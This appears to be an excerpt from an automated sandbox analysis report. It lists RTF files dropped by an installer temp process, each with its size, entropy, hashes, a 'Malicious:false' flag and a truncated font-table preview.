                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39768
                                                                                                                                                                                                                                                          Entropy (8bit):5.028438731643848
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2zFUZ47+E29oy2lV9GEij/R0qrsT+118lsqZ/6A9B:2zdTIA9B
                                                                                                                                                                                                                                                          MD5:A8C9AB020E61A95F3CBA163ABBF94E88
                                                                                                                                                                                                                                                          SHA1:041D13002452D2AC0CBE8A2CC4D646B284F1B9C6
                                                                                                                                                                                                                                                          SHA-256:2473E996CFF9D4ACA06608370BF1B5C0ACE937E4F8A1C699AAF2A5F87318D40F
                                                                                                                                                                                                                                                          SHA-512:13FB3383203232496A3551F2D6A39F210432C5DAB33A4101564416A0069E72F86F85C000EB8ABA4C2D8E66FB7B6165A34CD60DA0A8DFA0A48165F358B2E01269
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98587
                                                                                                                                                                                                                                                          Entropy (8bit):4.9835874653673855
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2zFbmxZM+tWe275kQOSAGc1Q33Tn4eMJ/fOcPI0QhhiLVpLCrLXI1nuT2njX8x3E:2zyeUnNIwuF+bDIA9n
                                                                                                                                                                                                                                                          MD5:B729EF1A2C1EDAB184EE72D97CCF04FA
                                                                                                                                                                                                                                                          SHA1:0B1E8F6E750120989728E8787722DB1E6C8AECA4
                                                                                                                                                                                                                                                          SHA-256:FF86B07534B3BA1FB795BB36C8A7E02DDCA3F591A3EB242AA9F35773BE52AA1B
                                                                                                                                                                                                                                                          SHA-512:8F4819A8CACAE7A93CF4BA2F42EABD64A6409B42F7D41B2363A6454591B7BF6C181E8F45F4359BACE952915008CDAD0EC59E8725E784657F3DEE795A19658EA3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53408
                                                                                                                                                                                                                                                          Entropy (8bit):5.027531716371282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+EvnaBT2njX8x33HcSAzpdhN0XmQ6ZdgvSSIAPZIAP6IAe+XUNRXp76PC:2QDXJksIA9U
                                                                                                                                                                                                                                                          MD5:3BA78ADB6E868B5B64CA3AFD406569D8
                                                                                                                                                                                                                                                          SHA1:3E8031CC5453C731A67604B495AEC251CAA93843
                                                                                                                                                                                                                                                          SHA-256:C4EAC5BC2B6C11C7ED8741FF1ACCCAB71230E01EDD80403655EE54254673DA83
                                                                                                                                                                                                                                                          SHA-512:28F58E5595C7DA45F3361C18B12014831D49B84D0FB572D331F2CFA71B8B22B16502DCDDFF6486F7767976BA0B379CBB21F467F9843962E4EA8A1E5E889EE79C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52084
                                                                                                                                                                                                                                                          Entropy (8bit):5.0360425372195605
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f85+jpnrNgVVhGPN2lV9GEijDKcAPv6SAJjVSkVeUZ53dqaYHErLm:2e720SvIA9l
                                                                                                                                                                                                                                                          MD5:6C1BF76AEB182845D933C43B2FD3AD7E
                                                                                                                                                                                                                                                          SHA1:2B5CF1297A2F29E1181C2231A521E57C207D16EC
                                                                                                                                                                                                                                                          SHA-256:972A316D680C8D41CC19BE92E617D07832A9038CE9E5EEA23F1ABCC5DA983EE4
                                                                                                                                                                                                                                                          SHA-512:7CC2F42278CDCC2DE781C8776095C83DB4739B635CDD93299A0BF08613C198A20F640BA8488C0B0655012D57B59F413EAF7EE57481BD4EBA3F5556E079D304B5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52052
                                                                                                                                                                                                                                                          Entropy (8bit):5.0423517848490995
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFD747+kxKTllT2njX8x3xezX3MmwxXoC+zKjkMpEZI6xAzj54vWHmI9ikzmind:2ee2XMIA9o
                                                                                                                                                                                                                                                          MD5:86DF8DBFBB9E6B68A8255BF9B36A9A79
                                                                                                                                                                                                                                                          SHA1:49BBA097A2FA7B3AA66E58F2ECCB244444C96AD3
                                                                                                                                                                                                                                                          SHA-256:232B3BC657DA966541951F2BCAD65B0394BA11608B61F60732E9049B70D8C46D
                                                                                                                                                                                                                                                          SHA-512:BE429F10D254B65E0DEBA90598DEF9ABACD7C641FDF418B7FA272DED99ABA0A3C6E91CF002CEFDB43D95F54466CD0631326788D6E59628ED0A7922422E530F5A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50366
                                                                                                                                                                                                                                                          Entropy (8bit):5.042918546603945
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFMz47wCEnkVlYgiDGi3w2EHnT2njX8x37HzX3MmwxEJBMmfX8+VUf8SP8VrZJ6:2ebHcIA9/
                                                                                                                                                                                                                                                          MD5:479AE0F93EE93B62EDED9259EFD3D417
                                                                                                                                                                                                                                                          SHA1:ADFC98043F7B02403F496028274A9849DADE9415
                                                                                                                                                                                                                                                          SHA-256:AE39FDC0D0299C5CC2AE703E1F39CE87FB6317DFEFA3DD3957CC3C7BFC94233D
                                                                                                                                                                                                                                                          SHA-512:914EB7570D95563A23BCF6CFC354297C7A9ECE8F48AC1E6F872B7CCAB00B9977271A7148444E8DD119EC6BD7C4A4DB4830EC7EEBDE89FDE72E6A20B3E5DA2E91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial CYR;}{\f41\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flo
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50160
                                                                                                                                                                                                                                                          Entropy (8bit):5.04516355825557
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f95+6+WGNgVVhGPNolV9GEijPKcAPv6SAJjZR6TYqEkc0ij82oXTq:2e796RTIA9l
                                                                                                                                                                                                                                                          MD5:D515DFD169E7F576978E8DDF94C8F57C
                                                                                                                                                                                                                                                          SHA1:776FDAA33E7FBEFB6ECCB018DEEBEC03F23977E9
                                                                                                                                                                                                                                                          SHA-256:3B6A48D3D59E44B95C982CD39E4F58CC7FA62237A089BDAC7844838F33C5CCD8
                                                                                                                                                                                                                                                          SHA-512:8A61180120ED053F471874E0A8FA145071E39F89633C5C7085E84EBAC8BCC2E734E68F95D0B5C5C71CF168D5824D044D38C3C330CF2093121019D953C73A3431
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48087
                                                                                                                                                                                                                                                          Entropy (8bit):5.042429118311867
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/fB5+aWqeNgVVhGPNNlV9GEijSKcAPv6SAJjeR+RP8yJ0LTrI6JtOt:2e7dRRoIA9f
                                                                                                                                                                                                                                                          MD5:4BF6C8774BA58F01B8916C5DDD525E82
                                                                                                                                                                                                                                                          SHA1:F493778C8F8CBD77CC9FC11F1E628FD05C6B0F87
                                                                                                                                                                                                                                                          SHA-256:1D3481510B1220FF2BB3EFBC4137E73A237842AEC233E289EDE6039412FC1ACA
                                                                                                                                                                                                                                                          SHA-512:208BA94ECDB45A089AD16A665DA51C7C29267268DE83DFC4F44D8EE29805031DD79E9681E12F6D5C8CE9C8E13FAFB3CB9C5DA535712416D4941233E546A794A8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98587
                                                                                                                                                                                                                                                          Entropy (8bit):4.9835874653673855
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2zFbmxZM+tWe275kQOSAGc1Q33Tn4eMJ/fOcPI0QhhiLVpLCrLXI1nuT2njX8x3E:2zyeUnNIwuF+bDIA9n
                                                                                                                                                                                                                                                          MD5:B729EF1A2C1EDAB184EE72D97CCF04FA
                                                                                                                                                                                                                                                          SHA1:0B1E8F6E750120989728E8787722DB1E6C8AECA4
                                                                                                                                                                                                                                                          SHA-256:FF86B07534B3BA1FB795BB36C8A7E02DDCA3F591A3EB242AA9F35773BE52AA1B
                                                                                                                                                                                                                                                          SHA-512:8F4819A8CACAE7A93CF4BA2F42EABD64A6409B42F7D41B2363A6454591B7BF6C181E8F45F4359BACE952915008CDAD0EC59E8725E784657F3DEE795A19658EA3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66281
                                                                                                                                                                                                                                                          Entropy (8bit):5.021285329842295
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDJw1w0kWBP+WLZdfzbwKsFPcZR1yc+rZE7feMShR/pVRVGcefxRBcnjX8x3JO:2Q4Bb6IA9Z
                                                                                                                                                                                                                                                          MD5:B9DE79AB06478D9A6CDFB82A7578E374
                                                                                                                                                                                                                                                          SHA1:E103E4E779C53988209B3F0F752754162A5F638B
                                                                                                                                                                                                                                                          SHA-256:7BCF98FA23001662B53624E64A48F45581CC6A5B70D53204203184A94581041B
                                                                                                                                                                                                                                                          SHA-512:98F38D4D6CE05FA571C3AD3EE7C8751777F2A6EFB95C619DCD55F3F873AEC2842A578CE4CC654F2AA56E015D3D29955B8C49FE38CC3CBFD1B9D9910E9C7D9EED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54667
                                                                                                                                                                                                                                                          Entropy (8bit):5.033087064941872
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDpxZMjE/d8NwyHF2njX8x3l7G5V5V5h5G5P5N5gkBJ5qA23YtFZSEHtoGCzU/:2Q9svIA9h
                                                                                                                                                                                                                                                          MD5:51AF8BBE0EB54E295570F088C17CBBA4
                                                                                                                                                                                                                                                          SHA1:E8CD73723EB618FA3F9A26B7F56EAA0C9397F0C9
                                                                                                                                                                                                                                                          SHA-256:E9E9F0B183F57BEA6BF02B6BDCBAB45B8BACDFF889CD4E6882E62C3E3F8CC4C8
                                                                                                                                                                                                                                                          SHA-512:582D0EB523E3AA4F152A858DD15C10F5379BA981EAAC75A5B427BCE8287634AF3D14D8AC045754B5FE3BEC9CAC317EC324D72EC2519C11FAE2A9FE3D60FD1F15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48219
                                                                                                                                                                                                                                                          Entropy (8bit):5.043881411943709
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCsxIa4IRVIvOM/rvg20xLjIddpuXVfs+zKjkMpTFFJ+kH3q+1yMPhU32n:2e7uFdIA9V
                                                                                                                                                                                                                                                          MD5:8C8176E8F2409E52F66BA8228B6EEEF4
                                                                                                                                                                                                                                                          SHA1:ED1F5902631C6273022B8C1C6582BD15FA76107F
                                                                                                                                                                                                                                                          SHA-256:FFE2EACEDE61AFC4BEF5370CF51CF41430F2660FEF291087150EF773793F5448
                                                                                                                                                                                                                                                          SHA-512:3210FB8DDB601E1CC322213CFAD6F6A463D882CCD2BA21A4ED19414FC074FA3AD597AAEA75F6B14D857EBE7FB54B5B0594F2661EDC7BAEC0BB26C746C841283D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
